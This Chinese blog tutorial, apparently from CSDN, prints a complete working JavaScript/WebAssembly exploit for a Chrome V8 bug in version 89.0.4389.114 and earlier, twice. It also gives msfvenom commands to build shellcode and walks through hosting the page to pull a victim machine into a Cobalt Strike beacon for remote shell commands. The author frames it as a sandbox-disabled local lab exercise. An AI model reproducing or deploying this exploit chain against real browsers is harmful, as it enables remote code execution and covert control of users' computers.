Chrome浏览器代码执行0day漏洞

适用版本:
漏洞危害:远程代码执行
影响版本:Chrome 89.0.4389.114以下(含89.0.4389.114)
测试版本: 86.0.4240.198

教程内容:
一、利用kali生成shellcode代码
比如说我要弹出计算器,那么:
64位操作系统:

msfvenom -a x64 -p windows/x64/exec CMD="calc" EXITFUNC=thread -f num

32位操作系统:

msfvenom -a x86 -p windows/exec CMD="calc" EXITFUNC=thread -f num

把这段16进制的数复制下来,放到下面代码第七行的括号里面:

<script>
 
function gc() {
 
for (var i = 0; i < 0x80000; ++i) {
 
var a = new ArrayBuffer();
 
}
 
}
 
let shellcode = []; //生成的shellcode放入中括号内
 
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
 
var wasmModule = new WebAssembly.Module(wasmCode);
 
var wasmInstance = new WebAssembly.Instance(wasmModule);
 
var main = wasmInstance.exports.main;
 
var bf = new ArrayBuffer(8);
 
var bfView = new DataView(bf);
 
function fLow(f) {
 
bfView.setFloat64(0, f, true);
 
return (bfView.getUint32(0, true));
 
}
 
function fHi(f) {
 
bfView.setFloat64(0, f, true);
 
return (bfView.getUint32(4, true))
 
}
 
function i2f(low, hi) {
 
bfView.setUint32(0, low, true);
 
bfView.setUint32(4, hi, true);
 
return bfView.getFloat64(0, true);
 
}
 
function f2big(f) {
 
bfView.setFloat64(0, f, true);
 
return bfView.getBigUint64(0, true);
 
}
 
function big2f(b) {
 
bfView.setBigUint64(0, b, true);
 
return bfView.getFloat64(0, true);
 
}
 
class LeakArrayBuffer extends ArrayBuffer {
 
constructor(size) {
 
super(size);
 
this.slot = 0xb33f;
 
}
 
}
 
function foo(a) {
 
let x = -1;
 
if (a) x = 0xFFFFFFFF;
 
var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
 
arr.shift();
 
let local_arr = Array(2);
 
local_arr[0] = 5.1;//4014666666666666
 
let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
 
arr[0] = 0x1122;
 
return [arr, local_arr, buff];
 
}
 
for (var i = 0; i < 0x10000; ++i)
 
foo(false);
 
gc(); gc();
 
[corrput_arr, rwarr, corrupt_buff] = foo(true);
 
corrput_arr[12] = 0x22444;
 
delete corrput_arr;
 
function setbackingStore(hi, low) {
 
rwarr[4] = i2f(fLow(rwarr[4]), hi);
 
rwarr[5] = i2f(low, fHi(rwarr[5]));
 
}
 
function leakObjLow(o) {
 
corrupt_buff.slot = o;
 
return (fLow(rwarr[9]) - 1);
 
}
 
let corrupt_view = new DataView(corrupt_buff);
 
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
 
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
 
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
 
let delta = baseAddr + 0x1c - idx0Addr;
 
if ((delta % 8) == 0) {
 
let baseIdx = delta / 8;
 
this.base = fLow(rwarr[baseIdx]);
 
} else {
 
let baseIdx = ((delta - (delta % 8)) / 8);
 
this.base = fHi(rwarr[baseIdx]);
 
}
 
let wasmInsAddr = leakObjLow(wasmInstance);
 
setbackingStore(wasmInsAddr, this.base);
 
let code_entry = corrupt_view.getFloat64(13 * 8, true);
 
setbackingStore(fLow(code_entry), fHi(code_entry));
 
for (let i = 0; i < shellcode.length; i++) {
 
corrupt_view.setUint8(i, shellcode[i]);
 
}
 
main();
 
</script>
就像下面这样:

保存这个txt文件为exploit.html(名字无所谓,别带中文)。

此次测试需要关闭沙箱环境:
右键单击chrome浏览器的图标(我这个是修改过的),然后在目标的最后面加上

--no-sandbox file:///C:/Users/xuanjian/Desktop/exploit.html(文件路径自己改)

点击“应用”,然后打开浏览器。


看到已经执行了命令cmd='calc',弹出了一个计算器。

二、利用cobaltstrike上线
前期准备:
如果你有两台电脑可以一台当服务端一台当客户端,但是如果像我一样,只有一台电脑,那么就按照以下这些步骤来。
我是拿我的宿主机当服务端,win10虚拟机当客户端,win7虚拟机当受害人。

在win10虚拟机和宿主机上面安装好apache2,如何安装请参考Apache安装教程_Junior2018的博客-CSDN博客_apache安装。
在win10虚拟机和宿主机上都放一份cobaltstrike,下载链接:文件密码:av41
关闭win10虚拟机和win7虚拟机的防火墙,包括域防火墙。(做完1这个操作之后按照234一步步点击)


教程内容:
在宿主机上以管理员身份打开cmd窗口,一定要管理员身份,然后输入cd 你的cobaltstrike目录,比如我是
cd C:\Users\nicolas\桌面\CobaltStrike\CobaltStrike,然后输入teamserver.bat 192.168.209.1 1234,192.168.209.1指的是宿主机的IP,1234是密码,可以随便输,但是不要中文。

出现这种内容就表示成功了。

然后打开win10虚拟机,单击cobaltsrike.bat:


输入IP是192.168.209.1、端口号50050(如果没开就新建个入站规则)、密码1234

进入之后,单击左上角的耳机符号的按钮:


3.点击最底下的“add”,按照下图内容填写,然后save保存:

其中,192.168.209.1和之前的要一致,端口号任意,只要不被占用即可。

点击最上面的攻击—>生成后门—>Payload Generator


然后填入以下内容,如果监听器一格没内容,就add添加进去,记得勾选“使用x64 payload”:

然后点击generate保存到电脑里面,如下图:

记事本打开这段payload,按快捷键ctrl+H把\全部替换为,0(注意是英文的,)


然后复制双引号里面的内容,记得去掉第一个逗号,发复制的内容粘贴在下面这段代码的第七行的括号里面。

<script>
 
function gc() {
 
for (var i = 0; i < 0x80000; ++i) {
 
var a = new ArrayBuffer();
 
}
 
}
 
let shellcode = []; //生成的shellcode放入中括号内
 
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
 
var wasmModule = new WebAssembly.Module(wasmCode);
 
var wasmInstance = new WebAssembly.Instance(wasmModule);
 
var main = wasmInstance.exports.main;
 
var bf = new ArrayBuffer(8);
 
var bfView = new DataView(bf);
 
function fLow(f) {
 
bfView.setFloat64(0, f, true);
 
return (bfView.getUint32(0, true));
 
}
 
function fHi(f) {
 
bfView.setFloat64(0, f, true);
 
return (bfView.getUint32(4, true))
 
}
 
function i2f(low, hi) {
 
bfView.setUint32(0, low, true);
 
bfView.setUint32(4, hi, true);
 
return bfView.getFloat64(0, true);
 
}
 
function f2big(f) {
 
bfView.setFloat64(0, f, true);
 
return bfView.getBigUint64(0, true);
 
}
 
function big2f(b) {
 
bfView.setBigUint64(0, b, true);
 
return bfView.getFloat64(0, true);
 
}
 
class LeakArrayBuffer extends ArrayBuffer {
 
constructor(size) {
 
super(size);
 
this.slot = 0xb33f;
 
}
 
}
 
function foo(a) {
 
let x = -1;
 
if (a) x = 0xFFFFFFFF;
 
var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
 
arr.shift();
 
let local_arr = Array(2);
 
local_arr[0] = 5.1;//4014666666666666
 
let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
 
arr[0] = 0x1122;
 
return [arr, local_arr, buff];
 
}
 
for (var i = 0; i < 0x10000; ++i)
 
foo(false);
 
gc(); gc();
 
[corrput_arr, rwarr, corrupt_buff] = foo(true);
 
corrput_arr[12] = 0x22444;
 
delete corrput_arr;
 
function setbackingStore(hi, low) {
 
rwarr[4] = i2f(fLow(rwarr[4]), hi);
 
rwarr[5] = i2f(low, fHi(rwarr[5]));
 
}
 
function leakObjLow(o) {
 
corrupt_buff.slot = o;
 
return (fLow(rwarr[9]) - 1);
 
}
 
let corrupt_view = new DataView(corrupt_buff);
 
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
 
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
 
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
 
let delta = baseAddr + 0x1c - idx0Addr;
 
if ((delta % 8) == 0) {
 
let baseIdx = delta / 8;
 
this.base = fLow(rwarr[baseIdx]);
 
} else {
 
let baseIdx = ((delta - (delta % 8)) / 8);
 
this.base = fHi(rwarr[baseIdx]);
 
}
 
let wasmInsAddr = leakObjLow(wasmInstance);
 
setbackingStore(wasmInsAddr, this.base);
 
let code_entry = corrupt_view.getFloat64(13 * 8, true);
 
setbackingStore(fLow(code_entry), fHi(code_entry));
 
for (let i = 0; i < shellcode.length; i++) {
 
corrupt_view.setUint8(i, shellcode[i]);
 
}
 
main();
 
</script>
保存这段代码为exploit.html,传到apache的htdocs目录下,然后打开win7虚拟机。

右键单击chrome浏览器图标,在目标后面加上--no-sandbox,表示关闭沙箱环境,否则沙箱可以识别出,点击“应用”。


然后打开chrome,在地址栏输入192.168.209.1/exploit.html,等一会儿出现下面这个界面就对了:

回到win10虚拟机,可以看到cs里面已经上线了我们的win7虚拟机:


我们可以单击右键进入beacon:

输入shell ipconfig即可查看我们win7虚拟机的IP地址:

还可以输入其他的命令,这里不一一展开了。

教程总结:
防火墙要关完全。
其实这个漏洞挺鸡肋的,因为要关闭沙箱,正常人不会这么做,就好比问别人要账号密码一样不太现实。
是一次初学者本地练习cs上线的不错的机会。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值